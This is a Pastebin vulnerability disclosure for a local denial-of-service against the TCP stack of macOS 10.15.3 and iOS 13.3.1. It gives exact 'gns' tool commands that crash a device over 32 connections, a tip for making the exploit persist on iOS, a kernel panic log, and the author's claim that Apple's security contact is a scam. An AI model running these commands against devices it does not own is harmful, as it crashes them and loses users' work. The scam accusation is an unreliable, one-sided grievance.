Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Crash macOS 10.15.3 and iOS 13.3.1 by sending large data packets >= 2MB over 16 or more TCP connections
- https://www.youtube.com/watch?v=yEUncSvY04Y
- https://www.youtube.com/watch?v=3p_hakQXYxo
- https://www.youtube.com/watch?v=E1Plab0CgJM
- https://www.youtube.com/watch?v=mJryK4kA0qM
- Exploit description
- Resource limits and handling within the TCP stack on iOS and macOS allow an attacker to exhaust a pool of system resources, causing system components to stop responding waiting to obtain a resource. As a result the user space is unable to service the watchdog, which expires a minute later generating a kernel panic.
- Attack vector
- To exploit the vulnerability one has to establish 16 or more TCP connections. 32 up to 128 work reliably and exploit it every time. Then start a dedicated thread for each connection and send large packets of size 2 MB or more. iOS reboots instantly. After successful exploit on macOS, the exploit application cannot be stopped or killed. Once at that state, some applications such as Activity Monitor stop responding, and within a minute there is a kernel panic (userspace watchdog timeout) and the machine powers off. The exploit can be triggered by any local user. On iOS, persistency can be obtained by registering the exploit to run as a Widget or handle Notifications.
- Vulnerability type: Denial of Service (local), may persist after reboot
- Component: kernel resource pool, TCP stack
- Vendor: Apple Inc.
- Product: macOS, iOS
- Version: macOS Catalina 10.15.3, iOS 13.3.1
- Impact: Denial of Service (local)
- product-security@apple.com is a scam! Apple do not want to acknowledge and pay bounty to people who discover exploits.
- I disclosed this exploit privately to them on 18th of February 2020. A couple of weeks later they stopped replaying to my e-mails.
- Proof of Concept POC: download my network benchmark tool and use it to exploit the vulnerability:
- http://httpstorm.com/tools/gns/
- Steps to reproduce:
- The device sending large data packets will crash. It can be server or client.
- exploit commands 1: the same device operates as both server and client and will crash. No remote server or client is required.
- devices opens a listening socket on TCP port 81, connects to itself and starts sending data over 32 connections.
- server: gns -lp81
- client: gns 127.0.0.1 81 -wc32
- exploit commands 2: client will crash
- server listens on TCP port 81, client connects to server IP on TCP port 81 and sends large data packets over 32 connections
- server: gns -lp81
- client: gns SERVER_IP 81 -wc32
- exploit commands 3: server will crash
- server listens on TCP port 81, client establishes 32 connection to server IP on TCP port 81, server sends large data packets over all connections
- server: gns -wlp81
- client: gns SERVER_IP 81 -c32
- Legend:
- l = listen
- p = specify port number
- 81 = user TCP port 81
- w = this device sends data over the TCP connection
- c = specify number of TCP connections
- 32 = use 32 TCP connections
- SERVER_IP = IP address of server
- panic(cpu 2 caller 0xffffff7f9bd9dad5): userspace watchdog timeout: remoted connection watchdog expired, no updates from remoted monitoring thread in 60 seconds, 27 checkins from thread since monitoring enabled 580 seconds ago after loadservice: com.apple.logd, total successful checkins since load (580 seconds ago): 58, last successful checkin: 10 seconds ago
- service: com.apple.WindowServer, total successful checkins since load (550 seconds ago): 54, last successful checkin: 10 seconds ago
- Backtrace (CPU 2), Frame : Return Address
- 0xffffff83c5dd3820 : 0xffffff801b33bb2b
- 0xffffff83c5dd3870 : 0xffffff801b4734d5
- 0xffffff83c5dd38b0 : 0xffffff801b464f4e
- 0xffffff83c5dd3900 : 0xffffff801b2e2a40
- 0xffffff83c5dd3920 : 0xffffff801b33b217
- 0xffffff83c5dd3a20 : 0xffffff801b33b5fb
- 0xffffff83c5dd3a70 : 0xffffff801bad2b25
- 0xffffff83c5dd3ae0 : 0xffffff7f9bd9dad5
- 0xffffff83c5dd3af0 : 0xffffff7f9bd9d7e6
- 0xffffff83c5dd3b10 : 0xffffff801ba6739b
- 0xffffff83c5dd3b60 : 0xffffff801ba70443
- 0xffffff83c5dd3ca0 : 0xffffff801b422d12
- 0xffffff83c5dd3db0 : 0xffffff801b3419d8
- 0xffffff83c5dd3e10 : 0xffffff801b318635
- 0xffffff83c5dd3e70 : 0xffffff801b32f0e5
- 0xffffff83c5dd3f00 : 0xffffff801b44b575
- 0xffffff83c5dd3fa0 : 0xffffff801b2e3226
- Kernel Extensions in backtrace:
- com.apple.driver.watchdog(1.0)[053A5D15-51D4-3E61-978B-EB435FA4BD0A]@0xffffff7f9bd9c000->0xffffff7f9bda4fff
- BSD process name corresponding to current thread: watchdogd
- Boot args: chunklist-security-epoch=0 -chunklist-no-rev2-dev
- Mac OS version:
- 19D76
- Kernel version:
- Darwin Kernel Version 19.3.0: Thu Jan 9 20:58:23 PST 2020; root:xnu-6153.81.5~1/RELEASE_X86_64
- Kernel UUID: A8DDE75C-CD97-3C37-B35D-1070CC50D2CE
- Kernel slide: 0x000000001b000000
- Kernel text base: 0xffffff801b200000
- __HIB text base: 0xffffff801b100000
- System model name: MacBookPro15,1 (Mac-937A206F2EE63C01)
- System shutdown begun: NO
- System uptime in nanoseconds: 589081430568
- last loaded kext at 18150396650: @kext.AMDFramebuffer 3.0.5 (addr 0xffffff7fa09c8000, size 249856)
- loaded kexts:
- @kext.AMDFramebuffer 3.0.5
- @kext.AMDRadeonX4000 3.0.5
- @kext.AMDRadeonServiceManager 3.0.5
- >!AGraphicsDevicePolicy 4.7.2
- @fileutil 20.036.15
- @AGDCPluginDisplayMetrics 4.7.2
- >!AHV 1
- |IOUserEthernet 1.0.1
- |IO!BSerialManager 7.0.3f5
- >pmtelemetry 1
- >!AUpstreamUserClient 3.6.8
- >!APlatformEnabler 2.7.0d0
- >AGPM 111.4.2
- >X86PlatformShim 1.0.0
- @Dont_Steal_Mac_OS_X 7.0.0
- >!A!IKBLGraphics 14.0.4
- >AGDCBacklightControl 4.7.2
- >ACPI_SMC_PlatformPlugin 1.0.0
- >!AThunderboltIP 3.1.3
- @kext.AMD9500!C 3.0.5
- >BridgeAudioCommunication 6.66
- >!ABacklight 180.1
- >!ATopCaseHIDEventDriver 3430.1
- >!AGFXHDA 100.1.424
- >!A!ISlowAdaptiveClocking 4.0.0
- >!A!IPCHPMC 2.0.1
- >!AMuxControl2 4.7.2
- >!AHIDALSService 1
- >!ABridgeAudio!C 6.66
- >!A!ICFLGraphicsFramebuffer 14.0.4
- >!AAVEBridge 6.1
- >!AFIVRDriver 4.1.0
- >!AMCCSControl 1.13
- @filesystems.autofs 3.0
- @filesystems.ntfs 3.14.3
- >BCMWLANFirmware4355.Hashstore 1
- >BCMWLANFirmware4364.Hashstore 1
- >BCMWLANFirmware4377.Hashstore 1
- >!AFileSystemDriver 3.0.1
- @filesystems.hfs.kext 522.0.9
- @BootCache 40
- @!AFSCompression.!AFSCompressionTypeDataless 1.0.0d1
- @!AFSCompression.!AFSCompressionTypeZlib 1.0.0
- >!AVirtIO 1.0
- >!ABCMWLANBusInterfacePCIe 1
- @filesystems.apfs 1412.81.1
- @private.KextAudit 1.0
- >!ASmartBatteryManager 161.0.0
- >!AACPIButtons 6.1
- >!ASMBIOS 2.1
- >!AACPIEC 6.1
- >!AAPIC 1.7
- $!AImage4 1
- @nke.applicationfirewall 303
- $TMSafetyNet 8
- @!ASystemPolicy 2.0.0
- |EndpointSecurity 1
- @kext.AMDRadeonX4100HWLibs 1.0
- @kext.AMDRadeonX4000HWServices 3.0.5
- |IOAVB!F 800.17
- >!ASSE 1.0
- @!AGPUWrangler 4.7.2
- >IOPlatformPluginLegacy 1.0.0
- >!AHDA!C 283.15
- |IOHDA!F 283.15
- >!ABacklightExpert 1.1.0
- >!AHS!BDriver 3430.1
- >IO!BHIDDriver 7.0.3f5
- |IONDRVSupport 569.4
- >!AActuatorDriver 3430.1
- >!AMultitouchDriver 3430.1
- >!AInputDeviceSupport 3430.1
- |IOSlowAdaptiveClocking!F 1.0.0
- >X86PlatformPlugin 1.0.0
- >IOPlatformPlugin!F 6.0.0d8
- >!AGraphicsControl 4.7.2
- >!AThunderboltEDMSink 4.2.2
- >!AThunderboltDPOutAdapter 6.2.5
- >!AHIDKeyboard 209
- |IO!BHost!CUARTTransport 7.0.3f5
- |IO!BHost!CTransport 7.0.3f5
- >!A!ILpssUARTv1 3.0.60
- >!A!ILpssUARTCommon 3.0.60
- >!AOnboardSerial 1.0
- >!ASMBusPCI 1.0.14d1
- @kext.AMDSupport 3.0.5
- @!AGraphicsDeviceControl 4.7.2
- |IOAccelerator!F2 438.3.1
- >!ASMBus!C 1.0.18d1
- |IOGraphics!F 569.4
- @plugin.IOgPTPPlugin 810.1
- |IOEthernetAVB!C 1.1.0
- @kext.triggers 1.0
- >usb.IOUSBHostHIDDevice 1.2
- >usb.cdc.ecm 5.0.0
- >usb.cdc.ncm 5.0.0
- >usb.cdc 5.0.0
- >usb.networking 5.0.0
- >usb.!UHostCompositeDevice 1.2
- |IOSurface 269.6
- @filesystems.hfs.encodings.kext 1
- |IOAudio!F 300.2
- @vecLib.kext 1.2.0
- >!ABCMWLANCore 1.0.0
- >mDNSOffloadUserClient 1.0.1b8
- >IOImageLoader 1.0.0
- |IOSerial!F 11
- |IO80211!FV2 1200.12.2b1
- >corecapture 1.0.4
- |IOSkywalk!F 1
- >!AThunderboltPCIDownAdapter 2.5.4
- >!AThunderboltDPInAdapter 6.2.5
- >!AThunderboltDPAdapter!F 6.2.5
- >!AHPM 3.4.4
- >!A!ILpssI2C!C 3.0.60
- >!A!ILpssDmac 3.0.60
- >!A!ILpssI2C 3.0.60
- >!AXsanScheme 3
- >usb.!UVHCIBCE 1.2
- >usb.!UVHCI 1.2
- >usb.!UVHCICommonBCE 1.0
- >usb.!UVHCICommon 1.0
- >!AThunderboltNHI 5.8.6
- |IOThunderbolt!F 7.6.0
- >!AEffaceableNOR 1.0
- |IOBufferCopy!C 1.1.0
- |IOBufferCopyEngine!F 1
- >usb.!UHostPacketFilter 1.0
- |IOUSB!F 900.4.2
- |IONVMe!F 2.1.0
- >usb.!UXHCIPCI 1.2
- >usb.!UXHCI 1.2
- >!AEFINVRAM 2.1
- >!AEFIRuntime 2.1
- >!ASMCRTC 1.0
- |IOSMBus!F 1.1
- |IOHID!F 2.0.0
- $quarantine 4
- $sandbox 300.0
- @kext.!AMatch 1.0.0d1
- >!AKeyStore 2
- >!UTDM 489.80.2
- |IOSCSIBlockCommandsDevice 422.0.2
- >!ACredentialManager 1.0
- >KernelRelayHost 1
- >!ASEPManager 1.0.1
- >IOSlaveProcessor 1
- >!AFDEKeyStore 28.30
- >!AEffaceable!S 1.0
- >!AMobileFileIntegrity 1.0.5
- @kext.CoreTrust 1
- |CoreAnalytics!F 1
- |IOTimeSync!F 810.1
- |IONetworking!F 3.4
- >DiskImages 493.0.0
- |IO!B!F 7.0.3f5
- |IO!BPacketLogger 7.0.3f5
- |IOUSBMass!SDriver 157.40.7
- |IOSCSIArchitectureModel!F 422.0.2
- |IO!S!F 2.1
- |IOUSBHost!F 1.2
- >usb.!UCommon 1.0
- >!UHostMergeProperties 1.2
- >!ABusPower!C 1.0
- |IOReport!F 47
- >!AACPIPlatform 6.1
- >!ASMC 3.1.9
- >watchdog 1
- |IOPCI!F 2.9
- |IOACPI!F 1.4
- @kec.pthread 1
- @kec.corecrypto 1.0
- @kec.Libm 1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement